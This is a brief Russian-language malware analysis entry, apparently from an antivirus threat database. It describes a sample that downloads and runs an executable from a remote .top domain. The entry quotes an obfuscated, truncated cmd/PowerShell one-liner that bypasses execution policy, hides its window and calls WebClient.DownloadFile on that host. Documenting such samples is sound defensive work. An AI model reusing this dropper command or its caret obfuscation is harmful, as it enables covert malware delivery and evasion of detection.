Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "Po^wE^rSh^eL^L.^eXE -E^X^E^C^U^tIonpOl^I^CY B^y^PASs^ -NOP^RoFI^le -wI^N^DOWS^T^yL^e h^idD^en (NeW-^o^bjEct S^YStEM.^nE^t^.wEBclIEn^t^)^.dOwnLOADfi^L^E('http://www.doorasope.to...
Сетевая активность
UDP
- DNS ASK do###sope.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "Po^wE^rSh^eL^L.^eXE -E^X^E^C^U^tIonpOl^I^CY B^y^PASs^ -NOP^RoFI^le -wI^N^DOWS^T^yL^e h^idD^en (NeW-^o^bjEct S^YStEM.^nE^t^.wEBclIEn^t^)^.dOwnLOADfi^L^E('http://www.doorasope.to...' (со скрытым окном)
